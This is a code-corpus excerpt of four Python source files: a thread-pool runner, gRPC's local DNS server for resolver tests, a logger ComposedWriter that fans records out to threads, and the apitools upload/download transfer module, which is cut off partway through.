source
stringlengths
3
86
python
stringlengths
75
1.04M
simple_thread_runner.py
import threading import queue from loguru import logger from typing import Callable, Any, Iterator, Iterable class SimpleThreadsRunner: """ A simple ThreadsRunner. This runs multiple threads to do the I/O; Performance is at least as good as Queue producer/consumer, which works in an analogous fashion. Empty the queue after use. """ SENTINEL = object() def __init__(self): self._queue = queue.Queue() self._lock = threading.RLock() self._threads = [] def prepare_threads(self, num_workers: int, fn: Callable[..., Any]) -> None: """ Threads are created only function is called, and terminate before it returns. They are there primarily to parallelize I/O (i.e.fetching web pages, download picture, scroll elasticsearch). """ for i in range(num_workers): t = threading.Thread(target=self.fetch, args=(fn,), name=f"child_thread_{i}") t.setDaemon(True) t.start() self._threads.append(t) def wait_threads(self): """ Tell all the threads to terminate (by sending a sentinel value) and wait for them to do so. """ # Note that you need two loops, since you can't say which # thread will get each sentinel for _ in self._threads: self._queue.put(self.SENTINEL) # sentinel for t in self._threads: t.join() self._threads = [] def fetch(self, fn: Callable[..., Any]) -> None: """ Get a Data to fetch from the work _queue. This is a handy method to run in a thread. """ while True: try: _data: Iterable = self._queue.get_nowait() i = self._queue.qsize() except Exception as e: logger.error(e) break logger.info('Current Thread Name Running %s ...' % threading.currentThread().name) try: if _data is self.SENTINEL: return fn(_data) except Exception as e: raise f'function: {fn.__name__} execution: {e}' self._queue.task_done() logger.info(f"Tasks left:{i}") def q_producer(self, _data): self._queue.put(_data) def get_qsize(self) -> int: """Get current size of queue, be aware this value is changed frequently as multiple threads may produce/consume data to the queue""" return self._queue.qsize() def q_consumer(self, num_workers: int, fn: Callable[..., Any]): """ Function can be used separately with q_producer """ with self._lock: try: self.prepare_threads(num_workers, fn) finally: self.wait_threads() def run_threads(self, num_workers: int, fn: Callable[..., Any], iter_data: Iterator[Any], batch_size: int = None): """Add batch_size params in case iter_data is huge number""" for _ in iter_data: self.q_producer(_) if batch_size: _qsize = self.get_qsize() if _qsize >= batch_size: self.q_consumer(num_workers, fn) _qsize = self.get_qsize() if _qsize != 0: self.q_consumer(num_workers, fn)
dns_server.py
#!/usr/bin/env python2.7 # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Starts a local DNS server for use in tests""" import argparse import sys import yaml import signal import os import threading import time import twisted import twisted.internet import twisted.internet.reactor import twisted.internet.threads import twisted.internet.defer import twisted.internet.protocol import twisted.names import twisted.names.client import twisted.names.dns import twisted.names.server from twisted.names import client, server, common, authority, dns import argparse import platform _SERVER_HEALTH_CHECK_RECORD_NAME = 'health-check-local-dns-server-is-alive.resolver-tests.grpctestingexp' # missing end '.' for twisted syntax _SERVER_HEALTH_CHECK_RECORD_DATA = '123.123.123.123' class NoFileAuthority(authority.FileAuthority): def __init__(self, soa, records): # skip FileAuthority common.ResolverBase.__init__(self) self.soa = soa self.records = records def start_local_dns_server(args): all_records = {} def _push_record(name, r): print('pushing record: |%s|' % name) if all_records.get(name) is not None: all_records[name].append(r) return all_records[name] = [r] def _maybe_split_up_txt_data(name, txt_data, r_ttl): start = 0 txt_data_list = [] while len(txt_data[start:]) > 0: next_read = len(txt_data[start:]) if next_read > 255: next_read = 255 txt_data_list.append(txt_data[start:start + next_read]) start += next_read _push_record(name, dns.Record_TXT(*txt_data_list, ttl=r_ttl)) with open(args.records_config_path) as config: test_records_config = yaml.load(config) common_zone_name = test_records_config['resolver_tests_common_zone_name'] for group in test_records_config['resolver_component_tests']: for name in group['records'].keys(): for record in group['records'][name]: r_type = record['type'] r_data = record['data'] r_ttl = int(record['TTL']) record_full_name = '%s.%s' % (name, common_zone_name) assert record_full_name[-1] == '.' record_full_name = record_full_name[:-1] if r_type == 'A': _push_record(record_full_name, dns.Record_A(r_data, ttl=r_ttl)) if r_type == 'AAAA': _push_record(record_full_name, dns.Record_AAAA(r_data, ttl=r_ttl)) if r_type == 'SRV': p, w, port, target = r_data.split(' ') p = int(p) w = int(w) port = int(port) target_full_name = '%s.%s' % (target, common_zone_name) r_data = '%s %s %s %s' % (p, w, port, target_full_name) _push_record( record_full_name, dns.Record_SRV(p, w, port, target_full_name, ttl=r_ttl)) if r_type == 'TXT': _maybe_split_up_txt_data(record_full_name, r_data, r_ttl) # Add an optional IPv4 record is specified if args.add_a_record: extra_host, extra_host_ipv4 = args.add_a_record.split(':') _push_record(extra_host, dns.Record_A(extra_host_ipv4, ttl=0)) # Server health check record _push_record(_SERVER_HEALTH_CHECK_RECORD_NAME, dns.Record_A(_SERVER_HEALTH_CHECK_RECORD_DATA, ttl=0)) soa_record = dns.Record_SOA(mname=common_zone_name) test_domain_com = NoFileAuthority( soa=(common_zone_name, soa_record), records=all_records, ) server = twisted.names.server.DNSServerFactory( authorities=[test_domain_com], verbose=2) server.noisy = 2 twisted.internet.reactor.listenTCP(args.port, server) dns_proto = twisted.names.dns.DNSDatagramProtocol(server) dns_proto.noisy = 2 twisted.internet.reactor.listenUDP(args.port, dns_proto) print('starting local dns server on 127.0.0.1:%s' % args.port) print('starting twisted.internet.reactor') twisted.internet.reactor.suggestThreadPoolSize(1) twisted.internet.reactor.run() def _quit_on_signal(signum, _frame): print('Received SIGNAL %d. Quitting with exit code 0' % signum) twisted.internet.reactor.stop() sys.stdout.flush() sys.exit(0) def flush_stdout_loop(): num_timeouts_so_far = 0 sleep_time = 1 # Prevent zombies. Tests that use this server are short-lived. max_timeouts = 60 * 10 while num_timeouts_so_far < max_timeouts: sys.stdout.flush() time.sleep(sleep_time) num_timeouts_so_far += 1 print('Process timeout reached, or cancelled. Exitting 0.') os.kill(os.getpid(), signal.SIGTERM) def main(): argp = argparse.ArgumentParser( description='Local DNS Server for resolver tests') argp.add_argument('-p', '--port', default=None, type=int, help='Port for DNS server to listen on for TCP and UDP.') argp.add_argument( '-r', '--records_config_path', default=None, type=str, help=('Directory of resolver_test_record_groups.yaml file. ' 'Defaults to path needed when the test is invoked as part ' 'of run_tests.py.')) argp.add_argument( '--add_a_record', default=None, type=str, help=('Add an A record via the command line. Useful for when we ' 'need to serve a one-off A record that is under a ' 'different domain then the rest the records configured in ' '--records_config_path (which all need to be under the ' 'same domain). Format: <name>:<ipv4 address>')) args = argp.parse_args() signal.signal(signal.SIGTERM, _quit_on_signal) signal.signal(signal.SIGINT, _quit_on_signal) output_flush_thread = threading.Thread(target=flush_stdout_loop) output_flush_thread.setDaemon(True) output_flush_thread.start() start_local_dns_server(args) if __name__ == '__main__': main()
composed_writer.py
#!/usr/bin/env python3 import logging import sys import threading from os.path import dirname, realpath sys.path.append(dirname(dirname(dirname(realpath(__file__))))) from logger.writers.writer import Writer # noqa: E402 from logger.utils import formats # noqa: E402 class ComposedWriter(Writer): ############################ def __init__(self, transforms=[], writers=[], check_format=False): """ Apply zero or more Transforms (in series) to passed records, then write them (in parallel threads) using the specified Writers. ``` transforms A single Transform, a list of Transforms, or None. writers A single Writer or a list of Writers. check_format If True, attempt to check that Transform/Writer formats are compatible, and throw a ValueError if they are not. If check_format is False (the default) the output_format() of the whole reader will be formats.Unknown. ``` Example: ``` writer = ComposedWriter(transforms=[TimestampTransform(), PrefixTransform('gyr1')], writers=[NetworkWriter(':6221'), LogfileWriter('/logs/gyr1')], check_format=True) ``` NOTE: we make the rash assumption that transforms are thread-safe, that is, that no mischief or corrupted internal state will result if more than one thread calls a transform at the same time. To be thread-safe, a transform must protect any changes to its internal state with a non-re-entrant thread lock, as described in the threading module. We do *not* make this assumption of our writers, and impose a lock to prevent a writer's write() method from being called a second time if the first has not yet completed. """ # Make transforms a list if it's not. Even if it's only one transform. if not isinstance(transforms, type([])): self.transforms = [transforms] else: self.transforms = transforms # Make writers a list if it's not. Even if it's only one writer. if not isinstance(writers, type([])): self.writers = [writers] else: self.writers = writers # One lock per writer, to prevent us from accidental re-entry if a # new write is requested before the previous one has completed. self.writer_lock = [threading.Lock() for w in self.writers] self.exceptions = [None for w in self.writers] # If they want, check that our writers and transforms have # compatible input/output formats. input_format = formats.Unknown if check_format: input_format = self._check_writer_formats() if not input_format: raise ValueError('ComposedWriter: No common format found ' 'for passed transforms (%s) and writers (%s)' % (self.transforms, self.writers)) super().__init__(input_format=input_format) ############################ def _run_writer(self, index, record): """Internal: grab the appropriate lock and call the appropriate write() method. If there's an exception, save it.""" with self.writer_lock[index]: try: self.writers[index].write(record) except Exception as e: self.exceptions[index] = e ############################ def apply_transforms(self, record): """Internal: apply the transforms in series.""" if record: for t in self.transforms: record = t.transform(record) if not record: break return record ############################ def write(self, record): """Transform the passed record and dispatch it to writers.""" # Transforms run in series record = self.apply_transforms(record) if record is None: return # No idea why someone would instantiate without writers, but it's # plausible. Try to be accommodating. if not self.writers: return # If we only have one writer, there's no point making things # complicated. Just write and return. if len(self.writers) == 1: self.writers[0].write(record) return # Fire record off to write() requests for each writer. writer_threads = [] for i in range(len(self.writers)): try: writer_name = str(type(self.writers[i])) t = threading.Thread(target=self._run_writer, args=(i, record), name=writer_name, daemon=True) t.start() except (OSError, RuntimeError) as e: logging.error('ComposedWriter failed to write to %s: %s', writer_name, e) t = None writer_threads.append(t) # Wait for all writes to complete for t in writer_threads: if t: t.join() # Were there any exceptions? Arbitrarily raise the first one in list exceptions = [e for e in self.exceptions if e] for e in exceptions: logging.error(e) if exceptions: raise exceptions[0] ############################ def _check_writer_formats(self): """Check that Writer outputs are compatible with each other and with Transform inputs. Return None if not.""" # Begin with output format of first transform and work way to end; # the output of each is input of next one. for i in range(1, len(self.transforms)): transform_input = self.transforms[i].input_format() previous_output = self.transforms[i - 1].output_format() if not transform_input.can_accept(previous_output): logging.error('Transform %s can not accept input format %s', self.transform[i], previous_output) return None # Make sure that all the writers can accept the output of the last # transform. if self.transforms: transform_output = self.transforms[-1].output_format() for writer in self.writers: if not writer.input_format().can_accept(transform_output): logging.error('Writer %s can not accept input format %s', writer, transform_output) return None # Finally, return the input_format that we can take. if self.transforms: return self.transforms[0].input_format() # If no transform, our input_format is the lowest common format of # our writers. If no writers, then we've got nothing - right? if not self.writers: logging.error('ComposedWriter has no transforms or writers?!?') return None lowest_common = self.writers[0].input_format() for writer in self.writers: lowest_common = writer.input_format().common(lowest_common) if not lowest_common: logging.error('No common input format among writers') return None return lowest_common
transfer.py
#!/usr/bin/env python # # Copyright 2015 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Upload and download support for apitools.""" from __future__ import print_function import email.generator as email_generator import email.mime.multipart as mime_multipart import email.mime.nonmultipart as mime_nonmultipart import io import json import mimetypes import os import threading import six from six.moves import http_client from apitools.base.py import buffered_stream from apitools.base.py import exceptions from apitools.base.py import http_wrapper from apitools.base.py import stream_slice from apitools.base.py import util __all__ = [ 'Download', 'Upload', 'RESUMABLE_UPLOAD', 'SIMPLE_UPLOAD', 'DownloadProgressPrinter', 'DownloadCompletePrinter', 'UploadProgressPrinter', 'UploadCompletePrinter', ] _RESUMABLE_UPLOAD_THRESHOLD = 5 << 20 SIMPLE_UPLOAD = 'simple' RESUMABLE_UPLOAD = 'resumable' def DownloadProgressPrinter(response, unused_download): """Print download progress based on response.""" if 'content-range' in response.info: print('Received %s' % response.info['content-range']) else: print('Received %d bytes' % response.length) def DownloadCompletePrinter(unused_response, unused_download): """Print information about a completed download.""" print('Download complete') def UploadProgressPrinter(response, unused_upload): """Print upload progress based on response.""" print('Sent %s' % response.info['range']) def UploadCompletePrinter(unused_response, unused_upload): """Print information about a completed upload.""" print('Upload complete') class _Transfer(object): """Generic bits common to Uploads and Downloads.""" def __init__(self, stream, close_stream=False, chunksize=None, auto_transfer=True, http=None, num_retries=5): self.__bytes_http = None self.__close_stream = close_stream self.__http = http self.__stream = stream self.__url = None self.__num_retries = 5 # Let the @property do validation self.num_retries = num_retries self.retry_func = ( http_wrapper.HandleExceptionsAndRebuildHttpConnections) self.auto_transfer = auto_transfer self.chunksize = chunksize or 1048576 def __repr__(self): return str(self) @property def close_stream(self): return self.__close_stream @property def http(self): return self.__http @property def bytes_http(self): return self.__bytes_http or self.http @bytes_http.setter def bytes_http(self, value): self.__bytes_http = value @property def num_retries(self): return self.__num_retries @num_retries.setter def num_retries(self, value): util.Typecheck(value, six.integer_types) if value < 0: raise exceptions.InvalidDataError( 'Cannot have negative value for num_retries') self.__num_retries = value @property def stream(self): return self.__stream @property def url(self): return self.__url def _Initialize(self, http, url): """Initialize this download by setting self.http and self.url. We want the user to be able to override self.http by having set the value in the constructor; in that case, we ignore the provided http. Args: http: An httplib2.Http instance or None. url: The url for this transfer. Returns: None. Initializes self. """ self.EnsureUninitialized() if self.http is None: self.__http = http or http_wrapper.GetHttp() self.__url = url @property def initialized(self): return self.url is not None and self.http is not None @property def _type_name(self): return type(self).__name__ def EnsureInitialized(self): if not self.initialized: raise exceptions.TransferInvalidError( 'Cannot use uninitialized %s', self._type_name) def EnsureUninitialized(self): if self.initialized: raise exceptions.TransferInvalidError( 'Cannot re-initialize %s', self._type_name) def __del__(self): if self.__close_stream: self.__stream.close() def _ExecuteCallback(self, callback, response): # TODO(craigcitro): Push these into a queue. if callback is not None: threading.Thread(target=callback, args=(response, self)).start() class Download(_Transfer): """Data for a single download. Public attributes: chunksize: default chunksize to use for transfers. """ _ACCEPTABLE_STATUSES = set(( http_client.OK, http_client.NO_CONTENT, http_client.PARTIAL_CONTENT, http_client.REQUESTED_RANGE_NOT_SATISFIABLE, )) _REQUIRED_SERIALIZATION_KEYS = set(( 'auto_transfer', 'progress', 'total_size', 'url')) def __init__(self, stream, progress_callback=None, finish_callback=None, **kwds): total_size = kwds.pop('total_size', None) super(Download, self).__init__(stream, **kwds) self.__initial_response = None self.__progress = 0 self.__total_size = total_size self.__encoding = None self.progress_callback = progress_callback self.finish_callback = finish_callback @property def progress(self): return self.__progress @property def encoding(self): return self.__encoding @classmethod def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds): """Create a new download object from a filename.""" path = os.path.expanduser(filename) if os.path.exists(path) and not overwrite: raise exceptions.InvalidUserInputError( 'File %s exists and overwrite not specified' % path) return cls(open(path, 'wb'), close_stream=True, auto_transfer=auto_transfer, **kwds) @classmethod def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds): """Create a new Download object from a stream.""" return cls(stream, auto_transfer=auto_transfer, total_size=total_size, **kwds) @classmethod def FromData(cls, stream, json_data, http=None, auto_transfer=None, **kwds): """Create a new Download object from a stream and serialized data.""" info = json.loads(json_data) missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys()) if missing_keys: raise exceptions.InvalidDataError( 'Invalid serialization data, missing keys: %s' % ( ', '.join(missing_keys))) download = cls.FromStream(stream, **kwds) if auto_transfer is not None: download.auto_transfer = auto_transfer else: download.auto_transfer = info['auto_transfer'] setattr(download, '_Download__progress', info['progress']) setattr(download, '_Download__total_size', info['total_size']) download._Initialize( # pylint: disable=protected-access http, info['url']) return download @property def serialization_data(self): self.EnsureInitialized() return { 'auto_transfer': self.auto_transfer, 'progress': self.progress, 'total_size': self.total_size, 'url': self.url, } @property def total_size(self): return self.__total_size def __str__(self): if not self.initialized: return 'Download (uninitialized)' return 'Download with %d/%s bytes transferred from url %s' % ( self.progress, self.total_size, self.url) def ConfigureRequest(self, http_request, url_builder): url_builder.query_params['alt'] = 'media' # TODO(craigcitro): We need to send range requests because by # default httplib2 stores entire reponses in memory. Override # httplib2's download method (as gsutil does) so that this is not # necessary. http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,) def __SetTotal(self, info): if 'content-range' in info: _, _, total = info['content-range'].rpartition('/') if total != '*': self.__total_size = int(total) # Note "total_size is None" means we don't know it; if no size # info was returned on our initial range request, that means we # have a 0-byte file. (That last statement has been verified # empirically, but is not clearly documented anywhere.) if self.total_size is None: self.__total_size = 0 def InitializeDownload(self, http_request, http=None, client=None): """Initialize this download by making a request. Args: http_request: The HttpRequest to use to initialize this download. http: The httplib2.Http instance for this request. client: If provided, let this client process the final URL before sending any additional requests. If client is provided and http is not, client.http will be used instead. """ self.EnsureUninitialized() if http is None and client is None: raise exceptions.UserError('Must provide client or http.') http = http or client.http if client is not None: http_request.url = client.FinalizeTransferUrl(http_request.url) url = http_request.url if self.auto_transfer: end_byte = self.__ComputeEndByte(0) self.__SetRangeHeader(http_request, 0, end_byte) response = http_wrapper.MakeRequest( self.bytes_http or http, http_request) if response.status_code not in self._ACCEPTABLE_STATUSES: raise exceptions.HttpError.FromResponse(response) self.__initial_response = response self.__SetTotal(response.info) url = response.info.get('content-location', response.request_url) if client is not None: url = client.FinalizeTransferUrl(url) self._Initialize(http, url) # Unless the user has requested otherwise, we want to just # go ahead and pump the bytes now. if self.auto_transfer: self.StreamInChunks() def __NormalizeStartEnd(self, start, end=None): if end is not None: if start < 0: raise exceptions.TransferInvalidError( 'Cannot have end index with negative start index') elif start >= self.total_size: raise exceptions.TransferInvalidError( 'Cannot have start index greater than total size') end = min(end, self.total_size - 1) if end < start: raise exceptions.TransferInvalidError( 'Range requested with end[%s] < start[%s]' % (end, start)) return start, end else: if start < 0: start = max(0, start + self.total_size) return start, self.total_size - 1 def __SetRangeHeader(self, request, start, end=None): if start < 0: request.headers['range'] = 'bytes=%d' % start elif end is None: request.headers['range'] = 'bytes=%d-' % start else: request.headers['range'] = 'bytes=%d-%d' % (start, end) def __ComputeEndByte(self, start, end=None, use_chunks=True): """Compute the last byte to fetch for this request. This is all based on the HTTP spec for Range and Content-Range. Note that this is potentially confusing in several ways: * the value for the last byte is 0-based, eg "fetch 10 bytes from the beginning" would return 9 here. * if we have no information about size, and don't want to use the chunksize, we'll return None. See the tests for more examples. Args: start: byte to start at. end: (int or None, default: None) Suggested last byte. use_chunks: (bool, default: True) If False, ignore self.chunksize. Returns: Last byte to use in a Range header, or None. """ end_byte = end if start < 0 and not self.total_size: return end_byte if use_chunks: alternate = start + self.chunksize - 1 if end_byte is not None: end_byte = min(end_byte, alternate) else: end_byte = alternate if self.total_size: alternate = self.total_size - 1 if end_byte is not None: end_byte = min(end_byte, alternate) else: end_byte = alternate return end_byte def __GetChunk(self, start, end, additional_headers=None): """Retrieve a chunk, and return the full response.""" self.EnsureInitialized() request = http_wrapper.Request(url=self.url) self.__SetRangeHeader(request, start, end=end) if additional_headers is not None: request.headers.update(additional_headers) return http_wrapper.MakeRequest( self.bytes_http, request, retry_func=self.retry_func, retries=self.num_retries) def __ProcessResponse(self, response): """Process response (by updating self and writing to self.stream).""" if response.status_code not in self._ACCEPTABLE_STATUSES: # We distinguish errors that mean we made a mistake in setting # up the transfer versus something we should attempt again. if response.status_code in (http_client.FORBIDDEN, http_client.NOT_FOUND): raise exceptions.HttpError.FromResponse(response) else: raise exceptions.TransferRetryError(response.content) if response.status_code in (http_client.OK, http_client.PARTIAL_CONTENT): self.stream.write(response.content) self.__progress += response.length if response.info and 'content-encoding' in response.info: # TODO(craigcitro): Handle the case where this changes over a # download. self.__encoding = response.info['content-encoding'] elif response.status_code == http_client.NO_CONTENT: # It's important to write something to the stream for the case # of a 0-byte download to a file, as otherwise python won't # create the file. self.stream.write('') return response def GetRange(self, start, end=None, additional_headers=None, use_chunks=True): """Retrieve a given byte range from this download, inclusive. Range must be of one of these three forms: * 0 <= start, end = None: Fetch from start to the end of the file. * 0 <= start <= end: Fetch the bytes from start to end. * start < 0, end = None: Fetch the last -start bytes of the file. (These variations correspond to those described in the HTTP 1.1 protocol for range headers in RFC 2616, sec. 14.35.1.) Args: start: (int) Where to start fetching bytes. (See above.) end: (int, optional) Where to stop fetching bytes. (See above.) additional_headers: (bool, optional) Any additional headers to pass with the request. use_chunks: (bool, default: True) If False, ignore self.chunksize and fetch this range in a single request. Returns: None. Streams bytes into self.stream. """ self.EnsureInitialized() progress_end_normalized = False if self.total_size is not None: progress, end_byte = self.__NormalizeStartEnd(start, end) progress_end_normalized = True else: progress = start end_byte = end while (not progress_end_normalized or end_byte is None or progress <= end_byte): end_byte = self.__ComputeEndByte(progress, end=end_byte, use_chunks=use_chunks) response = self.__GetChunk(progress, end_byte, additional_headers=additional_headers) if not progress_end_normalized: self.__SetTotal(response.info) progress, end_byte = self.__NormalizeStartEnd(start, end) progress_end_normalized = True response = self.__ProcessResponse(response) progress += response.length if response.length == 0: raise exceptions.TransferRetryError( 'Zero bytes unexpectedly returned in download response') def StreamInChunks(self, callback=None, finish_callback=None, additional_headers=None): """Stream the entire download in chunks.""" self.StreamMedia(callback=callback, finish_callback=finish_callback, additional_headers=additional_headers, use_chunks=True) def StreamMedia(self, callback=None, finish_callback=None, additional_headers=None, use_chunks=True): """Stream the entire download. Args: callback: (default: None) Callback to call as each chunk is completed. finish_callback: (default: None) Callback to call when the download is complete. additional_headers: (default: None) Additional headers to include in fetching bytes. use_chunks: (bool, default: True) If False, ignore self.chunksize and stream this download in a single request. Returns: None. Streams bytes into self.stream. """ callback = callback or self.progress_callback finish_callback = finish_callback or self.finish_callback self.EnsureInitialized() while True: if self.__initial_response is not None: response = self.__initial_response self.__initial_response = None else: end_byte = self.__ComputeEndByte(self.progress, use_chunks=use_chunks) response = self.__GetChunk( self.progress, end_byte, additional_headers=additional_headers) if self.total_size is None: self.__SetTotal(response.info) response = self.__ProcessResponse(response) self._ExecuteCallback(callback, response) if (response.status_code == http_client.OK or self.progress >= self.total_size): break self._ExecuteCallback(finish_callback, response) class Upload(_Transfer): """Data for a single Upload. Fields: stream: The stream to upload. mime_type: MIME type of the upload. total_size: (optional) Total upload size for the stream. close_stream: (default: False) Whether or not we should close the stream when finished with the upload. auto_transfer: (default: True) If True, stream all bytes as soon as the upload is created. """ _REQUIRED_SERIALIZATION_KEYS = set(( 'auto_transfer', 'mime_type', 'total_size', 'url')) def __init__(self, stream, mime_type, total_size=None, http=None, close_stream=False, chunksize=None, auto_transfer=True, progress_callback=None, finish_callback=None, **kwds): super(Upload, self).__init__( stream, close_stream=close_stream, chunksize=chunksize, auto_transfer=auto_transfer, http=http, **kwds) self.__complete = False self.__final_response = None self.__mime_type = mime_type self.__progress = 0 self.__server_chunk_granularity = None self.__strategy = None self.__total_size = None self.progress_callback = progress_callback self.finish_callback = finish_callback self.total_size = total_size @property def progress(self): return self.__progress @classmethod def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds): """Create a new Upload object from a filename.""" path = os.path.expanduser(filename) if not os.path.exists(path): raise exceptions.NotFoundError('Could not find file %s' % path) if not mime_type: mime_type, _ = mimetypes.guess_type(path) if mime_type is None: raise exceptions.InvalidUserInputError( 'Could not guess mime type for %s' % path) size = os.stat(path).st_size return cls(open(path, 'rb'), mime_type, total_size=size, close_stream=True, auto_transfer=auto_transfer, **kwds) @classmethod def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True, **kwds): """Create a new Upload object from a stream.""" if mime_type is None: raise exceptions.InvalidUserInputError( 'No mime_type specified for stream') return cls(stream, mime_type, total_size=total_size, close_stream=False, auto_transfer=auto_transfer, **kwds) @classmethod def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds): """Create a new Upload of stream from serialized json_data and http.""" info = json.loads(json_data) missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys()) if missing_keys: raise exceptions.InvalidDataError( 'Invalid serialization data, missing keys: %s' % ( ', '.join(missing_keys))) if 'total_size' in kwds: raise exceptions.InvalidUserInputError( 'Cannot override total_size on serialized Upload') upload = cls.FromStream(stream, info['mime_type'], total_size=info.get('total_size'), **kwds) if isinstance(stream, io.IOBase) and not stream.seekable(): raise exceptions.InvalidUserInputError( 'Cannot restart resumable upload on non-seekable stream') if auto_transfer is not None: upload.auto_transfer = auto_transfer else: upload.auto_transfer = info['auto_transfer'] upload.strategy = RESUMABLE_UPLOAD upload._Initialize( # pylint: disable=protected-access http, info['url']) upload.RefreshResumableUploadState() upload.EnsureInitialized() if upload.auto_transfer: upload.StreamInChunks() return upload @property def serialization_data(self): self.EnsureInitialized() if self.strategy != RESUMABLE_UPLOAD: raise exceptions.InvalidDataError( 'Serialization only supported for resumable uploads') return { 'auto_transfer': self.auto_transfer, 'mime_type': self.mime_type, 'total_size': self.total_size, 'url': self.url, } @property def complete(self): return self.__complete @property def mime_type(self): return self.__mime_type def __str__(self): if not self.initialized: return 'Upload (uninitialized)' return 'Upload with %d/%s bytes transferred for url %s' % ( self.progress, self.total_size or '???', self.url) @property def strategy(self): return self.__strategy @strategy.setter def strategy(self, value): if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD): raise exceptions.UserError(( 'Invalid value "%s" for upload strategy, must be one of ' '"simple" or "resumable".') % value) self.__strategy = value @property def total_size(self): return self.__total_size @total_size.setter def total_size(self, value): self.EnsureUninitialized() self.__total_size = value def __SetDefaultUploadStrategy(self, upload_config, http_request): """Determine and set the default upload strategy for this upload. We generally prefer simple or multipart, unless we're forced to use resumable. This happens when any of (1) the upload is too large, (2) the simple endpoint doesn't support multipart requests and we have metadata, or (3) there is no simple upload endpoint. Args: upload_config: Configuration for the upload endpoint. http_request: The associated http request. Returns: None. """ if upload_config.resumable_path is None: self.strategy = SIMPLE_UPLOAD if self.strategy is not None: return strategy = SIMPLE_UPLOAD if (self.total_size is not None and self.total_size > _RESUMABLE_UPLOAD_THRESHOLD): strategy = RESUMABLE_UPLOAD if http_request.body and not upload_config.simple_multipart: strategy = RESUMABLE_UPLOAD if not upload_config.simple_path: strategy = RESUMABLE_UPLOAD self.strategy = strategy def ConfigureRequest(self, upload_config, http_request, url_builder): """Configure the request and url for this upload.""" # Validate total_size vs. max_size if (self.total_size and upload_config.max_size and self.total_size > upload_config.max_size): raise exceptions.InvalidUserInputError( 'Upload too big: %s larger than max size %s' % ( self.total_size, upload_config.max_size)) # Validate mime type if not util.AcceptableMimeType(upload_config.accept, self.mime_type): raise exceptions.InvalidUserInputError( 'MIME type %s does not match any accepted MIME ranges %s' % ( self.mime_type, upload_config.accept)) self.__SetDefaultUploadStrategy(upload_config, http_request) if self.strategy == SIMPLE_UPLOAD: url_builder.relative_path = upload_config.simple_path if http_request.body: url_builder.query_params['uploadType'] = 'multipart' self.__ConfigureMultipartRequest(http_request) else: url_builder.query_params['uploadType'] = 'media' self.__ConfigureMediaRequest(http_request) else: url_builder.relative_path = upload_config.resumable_path url_builder.query_params['uploadType'] = 'resumable' self.__ConfigureResumableRequest(http_request) def __ConfigureMediaRequest(self, http_request): """Configure http_request as a simple request for this upload.""" http_request.headers['content-type'] = self.mime_type http_request.body = self.stream.read() http_request.loggable_body = '<media body>' def __ConfigureMultipartRequest(self, http_request): """Configure http_request as a multipart request for this upload.""" # This is a multipart/related upload. msg_root = mime_multipart.MIMEMultipart('related') # msg_root should not write out its own headers setattr(msg_root, '_write_headers', lambda self: None) # attach the body as one part msg = mime_nonmultipart.MIMENonMultipart( *http_request.headers['content-type'].split('/')) msg.set_payload(http_request.body) msg_root.attach(msg) # attach the media as the second part msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/')) msg['Content-Transfer-Encoding'] = 'binary' msg.set_payload(self.stream.read()) msg_root.attach(msg) # NOTE: We encode the body, but can't use # `email.message.Message.as_string` because it prepends # `> ` to `From ` lines. fp = six.BytesIO() if six.PY3: generator_class = email_generator.BytesGenerator else: generator_class = email_generator.Generator g = generator_class(fp, mangle_from_=False) g.flatten(msg_root, unixfrom=False) http_request.body = fp.getvalue() multipart_boundary = msg_root.get_boundary() http_request.headers['content-type'] = ( 'multipart/related; boundary=%r' % multipart_boundary) if isinstance(multipart_boundary, six.text_type): multipart_boundary = multipart_boundary.encode('ascii') body_components = http_request.body.split(multipart_boundary) headers, _, _ = body_components[-2].partition(b'\n\n') body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--']) http_request.loggable_body = multipart_boundary.join(body_components) def __ConfigureResumableRequest(self, http_request): http_request.headers['X-Upload-Content-Type'] = self.mime_type if self.total_size is not None: http_request.headers[ 'X-Upload-Content-Length'] = str(self.total_size) def RefreshResumableUploadState(self): """Talk to the server and refresh the state of this resumable upload. Returns: Response if the upload is complete. """ if self.strategy != RESUMABLE_UPLOAD: return self.EnsureInitialized() refresh_request = http_wrapper.Request( url=self.url, http_method='PUT', headers={'Content-Range': 'bytes */*'}) refresh_response = http_wrapper.MakeRequest( self.http, refresh_request, redirections=0, retries=self.num_retries) range_header = self._GetRangeHeaderFromResponse(refresh_response) if refresh_response.status_code in (http_client.OK, http_client.CREATED): self.__complete = True self.__progress = self.total_size self.stream.seek(self.progress) # If we're finished, the refresh response will contain the metadata # originally requested. Cache it so it can be returned in # StreamInChunks. self.__final_response = refresh_response elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE: if range_header is None: self.__progress = 0 else: self.__progress = self.__GetLastByte(range_header) + 1 self.stream.seek(self.progress) else: raise exceptions.HttpError.FromResponse(refresh_response) def _GetRangeHeaderFromResponse(self, response): return response.info.get('Range', response.info.get('range')) def InitializeUpload(self, http_request, http=None, client=None): """Initialize this upload from the given http_request.""" if self.strategy is None: raise exceptions.UserError( 'No upload strategy set; did you call ConfigureRequest?') if http is None and client is None: raise exceptions.UserError('Must provide client or http.') if self.strategy != RESUMABLE_UPLOAD: return http = http or client.http if client is not None: http_request.url = client.FinalizeTransferUrl(http_request.url) 